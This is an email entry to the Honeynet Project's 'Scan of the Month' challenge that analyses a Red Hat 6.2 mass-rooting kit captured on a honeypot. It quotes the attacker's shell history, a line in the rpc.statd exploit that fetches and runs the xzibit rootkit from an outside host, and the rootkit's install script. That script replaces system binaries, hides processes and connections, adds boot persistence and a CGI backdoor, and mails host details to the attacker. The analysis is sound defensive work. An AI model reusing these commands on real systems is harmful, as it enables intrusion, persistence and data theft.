From ndesai01@tampabay.rr.com Sat Mar 17 20:03:01 2001 Date: Tue, 13 Mar 2001 12:44:03 -0500 From: Neil Desai To: project@honeynet.org Subject: Scan of the Month [ Part 1, Text/PLAIN (charset: ISO-8859-1 "Latin 1") 1,001 lines. ] [ Unable to print this part. ] [ The following text is in the "iso-8859-1" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] 1. What is the attacker attempting to do with his command line syntax? The attacker is scanning a large range of IP addresses. The scans are not performed on regular classful IP boundaries. The two variables that the attacker is passing to the luckgo script are the first and second octets of the IP address range. In effect the attacker is scanning 65,535 hosts with each start of the luckgo script. Jan 8 18:47:52 honeypot -bash: HISTORY: PID=1246 UID=0 cd .mail /*The attacker attempted to go to the .mail directory. I am not sure why.*/ Jan 8 18:48:00 honeypot -bash: HISTORY: PID=1246 UID=0 cd /usr/sbin/.mail */The attacker attempted to go to the /usr/sbin/.mail directory. I am not sure why.*/ Jan 8 18:48:12 honeypot -bash: HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR */The attacker uses lynx to download LUCKROOT.TAR from www.becys.org.*/ Jan 8 18:48:31 honeypot -bash: HISTORY: PID=1246 UID=0 y */The attacker ends the lynx program.*/ Jan 8 18:48:45 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR */The attacker tries to unzip LUCKROOT.TAR but is unsuccessful. This is the message that the attacker gets: tar: z: Cannot open: No such file or directory tar: Error is not recoverable: exiting now The "z" options needs to be after the "x" option.*/ Jan 8 18:48:59 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf Lu */The attacker tries to uncompress "Lu" instead of "LUCKROOT.TAR" and is unsuccessful. This is the error the attacker gets: tar (child): Lu: Cannot open: No such file or directory tar (child): Error is not recoverable: exiting now tar: Child returned status 2 tar: Error exit delayed from previous errors */ Jan 8 18:49:01 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf L */The attacker tries to uncompress "L" instead to "LUCKROOT.TAR" and is unsuccessful. This is the error the attacker gets: tar (child): L: Cannot open: No such file or directory tar (child): Error is not recoverable: exiting now tar: Child returned status 2 tar: Error exit delayed from previous errors I think that the attacker forgot to hit the tab key to complete the command.*/ Jan 8 18:49:03 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR */The attacker successfully extracts the files from "LUCKROOT.TAR". This is the output that the attacker gets: luckroot\ luckroot\luckstatdx.c luckroot\luckgo luckroot\luckscan-a.c luckroot\luckscan-a luckroot\luckstatdx The directory "luckroot" is created and the files luckstatdx.c, luckgo, luckscan-a.c, luckscan-a, luckstatdx are moved into it.*/ Jan 8 18:49:06 honeypot -bash: HISTORY: PID=1246 UID=0 cd luckroot */The attacker goes to the luckroot dirctory.*/ Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210 */The attacker runs the "luckgo" script and is scanning the 216.210.xxx.xxx address range for vulnerable Redhat hosts.*/ Jan 8 18:51:07 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120 */The attacker runs the "luckgo" script and is scanning the 200.120.xxx.xxx address range for vulnerable Redhat hosts.*/ Jan 8 18:51:43 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 120 */The attacker runs the "luckgo" script and is scanning the 64.120.xxx.xxx address range for vulnerable Redhat hosts.*/ Jan 8 18:52:00 honeypot -bash: HISTORY: PID=1246 UID=0 .luckgo 216 200 */The attacker forgets to add the "/" after the ".". The script does not run this time. This is the message that the attacker gets: bash: .luckgo: command not found */ Jan 8 18:52:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 200 */The attacker makes the change and tries it again, this time scanning the 216.200.xxx.xxx address range for vulnerable Redhat hosts.*/ Jan 8 18:54:37 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120 */The attacker runs the "luckgo" script and is scanning the 200.120.xxx.xxx address range for vulnerable Redhat hosts.*/ Jan 8 18:55:26 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 63 1 */The attacker runs the "luckgo" script and is scanning the 63.1.xxx.xxx address range for vulnerable Redhat hosts.*/ Jan 8 18:56:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 10 */The attacker runs the "luckgo" script and is scanning the 216.10.xxx.xxx address range for vulnerable Redhat hosts.*/ Jan 8 19:06:04 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 120 */The attacker runs the "luckgo" script and is scanning the 210.120.xxx.xxx address range for vulnerable Redhat hosts.*/ Jan 8 19:07:03 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 1 */The attacker runs the "luckgo" script and is scanning the 64.1.xxx.xxx address range for vulnerable Redhat hosts.*/ Jan 8 19:07:34 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1 */The attacker runs the "luckgo" script and is scanning the 216.1.xxx.xxx address range for vulnerable Redhat hosts.*/ Jan 8 19:09:41 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 194 1 */The attacker runs the "luckgo" script and is scanning the 194.1.xxx.xxx address range for vulnerable Redhat hosts.*/ Jan 8 19:10:53 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1 */The attacker runs the "luckgo" script and is scanning the 216.1.xxx.xxx address range for vulnerable Redhat hosts.*/ Jan 8 19:12:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 128 */The attacker runs the "luckgo" script and is scanning the 210.128.xxx.xxx address range for vulnerable Redhat hosts.*/ Jan 8 19:23:30 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 24 1 */The attacker runs the "luckgo" script and is scanning the 24.1.xxx.xxx address range for vulnerable Redhat hosts.*/ Jan 8 19:35:55 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 12 20 */The attacker runs the "luckgo" script and is scanning the 12.20.xxx.xxx address range for vulnerable Redhat hosts.*/ 2. What does the tool accomplish? This tool kit scans the IP address ranges entered by the attacker and attempts to root RedHat 6.2 hosts that have port 111 open. It attempts to exploit the rpc.statd buffer overflow vulnerability (http://packetstorm.securify.com/advisories/redhat/rhsa.2000-043-01.statd). If the attacker is able to get root access to the host then it will download a rootkit from becys.org and install it. During the installation a message is sent to becys@becys.org informing them of the rooted host. The new rootkit replaces the files: /sbin/ifconfig, /bin/netstat, /bin/ps, /usr/bin/top with trojaned versions from the Linux Root Kit v5 by Lord Somer. 3. How does the tool work? Luckgo This script gets input from the attacker and passes it to luckscan-a. The input that is given to luckscan-a is the first and second octet of an IP address. The script only checks to see if any data is entered, and does not check the validity of the input. if [ "$1" = "" ]; then echo " ${cyn}${blink}no${cl}${wht}." echo "" echo "$rver usage is $0 123 .That is all what u need to do.123 is a class A for h4x0r|ng. " exit 0 fi echo " ${cyn}right ${hblk}on${cl}" echo "" if [ "$1" = "" ]; then echo "Enter class A net to scan and h4x0r it for u." exit 1 As long as the data is entered the script will then check to see if the files "luckscan" and "luckstatdx" are executable. if [ -x luckscan ] && [ -x luckstatdx ]; What I did not understand is why it is checking "luckscan" instead of "luckscan-a". I think that this is an error on their part and the script will always test false on this. If both the files are not executable, then it will compile "luckscan-a.c" and "luckstatdx.c" to "luckscan" and "luckstatdx" respectively. If "scan.log" exists then the “luckgo” script removes it. Finally it runs "luckscan-a $1 111 $2 $3". The variables are: $1 (first octet in IP address), 111 (port to scan for, SUNRPC), $2 (second octet in IP address), $3 (third octet in IP addrss). Luckscan-a This is a compiled "c" program. It checks to make sure that the each variable entered by the attacker is a number greater than 0 but less than 255. It also checks to make sure that the port that is to be scanned is not 0 (zero). aa = atoi(argv[1]); if ((aa < 0) || (aa > 255)) { fatal("Invalid a-range\n"); } port = (unsigned int)atoi(argv[2]); if (port == 0) fatal("Bad port number.\n"); if (argc >= 4) { bb = atoi(argv[3]); if ((bb < 0) || (bb > 255)) fatal("Invalid b-range.\n"); } if (argc >= 5) { cc = atoi(argv[4]); if ((cc < 0) || (cc > 255)) fatal("Invalid c-range.\n"); } It will then start scanning for IP address ranges that are entered in by the attacker. After it starts scanning the IP address ranges it builds a list of hosts that are up and have port 111 open. When it is done it runs "luckstatdx" with the “-d” options set to "0". sprintf(luck,"./luckstatdx -d 0 %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)- connlist[i].a)); luckstatdx This script actually runs the exploit against the rpc.statd service and attempts to gain root access to the host. This program is run with the "-d" option set to "0" and is looking specifically for RedHat 6.2 hosts. struct type types[] = { {0, "Redhat 6.2 (nfs-utils-0.1.6-2)", shellcode, 0xbffff314, 1024, 600, 9}, {1, "Redhat 6.1 (knfsd-1.4.7-7)", shellcode, 0xbffff314, 1024, 600, 9}, {2, "Redhat 6.0 (knfsd-1.2.2-4)", shellcode, 0xbffff314, 1024, 600, 9}, {0, NULL, NULL, 0, 0, 0, 0} }; If this program is able to get root access to the host it will download xzibit.tar.gz, a rootkit, from becys.org. It will then install the rootkit and remove the original xzibit.tar.gz file. send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0); xzibit.tar.gz This is the rootkit that gets installed via the "luckstatdx" program. This rootkit consists of the following files: becys.cgi, hdparm, ifconfig, install, linsniffer, logclear, netstat, ps, s, sense, sl2, ssh_host_key, ssh_random_seed, sshdu and top. When the install script is run it will replace /sbin/ifconfig, /bin/netstat, /bin/ps and /usr/bin/top with trojaned versions from the Linux Root Kit v5. Install (script from xzibit.tar.gz) The install script first starts by removing the original /sbin/ifconfig, /bin/netstat, /bin/ps and /usr/bin/top with the versions from the Linux Root Kit v5. rm -rf /sbin/ifconfig mv ifconfig /sbin/ifconfig rm -rf /bin/netstat mv netstat /bin/netstat rm -rf /bin/ps mv ps /bin/ps rm -rf /usr/bin/top mv top /usr/bin/top The script then make the file “/dev/dsx”. I think that this is a configuration file for the trojaned “ps” and “top” files. In the original Linux Root Kit v5 “README” file it says that a value of 3 will hide all processes with the name “hack” in them. This seems to be altered to that it will not show any of the commands in this configuration file with the following names: sl2, sshdu, linsniffer, smurf, slice, mech, muh, bnc or psybnc. touch /dev/dsx >/dev/dsx echo "3 sl2" >>/dev/dsx echo "3 sshdu" >>/dev/dsx echo "3 linsniffer" >>/dev/dsx echo "3 smurf" >>/dev/dsx echo "3 slice" >>/dev/dsx echo "3 mech" >>/dev/dsx echo "3 muh" >>/dev/dsx echo "3 bnc" >>/dev/dsx echo "3 psybnc" >> /dev/dsx I noticed that all of the names that are entered in this configuration file were not a part of the xzibit.tar.gz rootkit. Either the attack is a script kiddie that is using someone else’s “install” script or they plan to install those programs later. The second configuration file that it makes is “/dev/caca”. This is the configuration file for the trojaned “netstat” utility. When someone runs any form of netstat on this node they will not see any TCP or UDP connections to the 193.231.139.xxx, 213.154.137.xxx and 193.254.34.xxx address spaces. It will not show any connections to the local ports 6969, 3666, 31221 and 22546 or to the remote ports 6969 and 2222. touch /dev/caca >/dev/caca echo "1 193.231.139" >>/dev/caca echo "1 213.154.137" >>/dev/caca echo "1 193.254.34" >>/dev/caca echo "3 6969" >>/dev/caca echo "3 3666" >>/dev/caca echo "3 31221" >>/dev/caca echo "3 22546" >>/dev/caca echo "4 6969" >>/dev/caca echo "4 2222" >>/dev/caca The install script then makes a “home” directory in “/dev/ida/.inet” and moves the rest of the files there. echo "Creating home... " mkdir -p /dev/ida/.inet echo "Copying SSHD and shit..." mv -f linsniffer logclear sense sl2 sshdu s ssh_host_key ssh_random_seed sl2new.c /dev/ida/.inet/ There is no “sl2new.c” file in the tar file that I downloaded so I am not sure if it an error in the script or a file that was forgotten. The script then makes a file called “tcp.log” in “/dev/ida/.inet”. This is where the output from “linsniffer” will be sent. touch /dev/ida/.inet/tcp.log It then appends the line “/usr/bin/hdparm –t1 –X53 –p” to “/etc/rc.d/rc.sysinit” echo "/usr/bin/hdparm -t1 -X53 -p" >> /etc/rc.d/rc.sysinit echo >> /etc/rc.d/rc.sysinit It is made to look like the real “hdparm” utility for hard drive performance tuning under Linux. It is added here so that the “hdparm” script will run at startup. Next it moves the file “hdparm” to “/usr/bin” and sets the permissions on it so that only the owner can read and execute it. The script also sets the permissions on the “hdparm” file so that it can’t be modified or removed except by the root user and then executes the “hdparm” script. mv hdparm -f /usr/bin/ chmod 500 /usr/bin/hdparm chattr +i /usr/bin/hdparm /usr/bin/hdparm Next it looks for the “cgi-bin” directory and if it finds it then it move the “becys.cgi” file there. if [ -d /home/httpd/cgi-bin ] then mv -f becys.cgi /home/httpd/cgi-bin/ fi if [ -d /usr/local/httpd/cgi-bin ] then mv -f becys.cgi /usr/local/httpd/cgi-bin/ fi if [ -d /usr/local/apache/cgi-bin ] then mv -f becys.cgi /usr/local/apache/cgi-bin/ fi if [ -d /www/httpd/cgi-bin ] then mv -f becys.cgi /www/httpd/cgi-bin/ fi if [ -d /www/cgi-bin ] then mv -f becys.cgi /www/cgi-bin/ fi After that is complete it makes the file “/tmp/info” and dumps the IP addresses, the FQDN (fully qualified domain name) and all the system information. Then it mails this information to becys@becys.org and removes the “/tmp/info” file. touch /tmp/info /sbin/ifconfig | grep inet >> /tmp/info hostname -f >> /tmp/info uname -a >> /tmp/info cat /tmp/info | mail -s "becys rewting" becys@becys.org rm -f /tmp/info The last thing that is done is it removes the files and directories that it created. rm -rf lamerk xzibit.tar.gz hdparm (script from xzibit.tar.gz) The script is named to hide the true identity of what it does. When an administrator sees this in the “/etc/rc.d/rc.sysinit” file he/she will not think anything of this even if they look up the options that were supplied with it. The hdparm script starts the SSH daemon and “linsniffer”. cd /dev/ida/.inet ./sshdu -f ./s ./linsniffer >> ./tcp.log & cd / sshdu (ssh daemon from xzibit.tar.gz) This is the ssh daemon that will allow the attacker back into the system securely. The “-f” options tell it to read a file for it’s configuration information, in this case “./s”. Logclear (script from xzibit.tar.gz) The logclear script will kill the “linsniffer” and remove the current “tcp.log” file. It will then create a new “tcp.log” file and restart “linsniffer” and redirect it’s output to “tcp.log”. killall -9 linsniffer rm -rf tcp.log touch tcp.log ./linsniffer >tcp.log & sense (PERL script from xzibit.tar.gz) This PERL script is written by Mike Edulla and is meant to sort the output from “linsniffer ver 0.03”. ssh_random_seed and ssh_host_key (configuration files from xzibit.tar.gz) The ssh_random_seed and ssh_host_key files are for using the SSH daemon that they have installed. Becys.cgi Allows the attacker a “web interface” to the compromised host. The attacker can run commands from a web browser. Sl2 (file from xzibit.tar.gz) I am not sure what this is. I think that it is a DoS tool, but was unable to find out how it works. Linsniffer (file from xzibit.tar.gz) This sniffer is made to find usernames and passwords and log them to a file. It does not get an other information. Ifconifg, ps, netstat and top (files from xzibit.tar.gz) All of these utilities are form the Linux Root Kit v5. 4. Is this tool a worm, or would you classify it as something else? I would not classify this tool as a worm because it lacks the ability to self propagate. I would consider it a tool for a mass rooting of Redhat 6.2 hosts. 5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? As far as I can tell the "luckgo" script is original as well as the "luckscan-a" program. The "luckstatdx" program is a modification of ron1n's "statdx.c". Becys modified the orignal "statdx.c" to download "xzibit.tar.gz" when it roots the host. Becys also removed all the information that ron1n gives on the exploit. Some of the tools that were in the xzibit.tar.gz were from the Linux Root Kit v5 and some were written most likely by the attacker. // Becys was modify herre some cmd. fmax = max(fileno(stdin), sockd) + 1; send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; // Aici cred ca trebuie un exit. Bonus Question: What information can you obtain about who is using or created the tool? The attackers that did this are BeCyS and ReSpEkt. The domain becys.org (64.176.171.107) resides in Baltimore, Maryland. I looked up the IP address ranges that were in the “netstat” configuration file and this is what I found: 193.231.139.0 - 193.231.139.255 Allocated to ROEDUNET connected highschools Romania 213.154.135.0 - 213.154.140.255 PCNET - ATM-ADSL Network Romania 193.254.34.0 - 193.254.34.15 FININVEST Romania Gheorghe Popa Neil Desai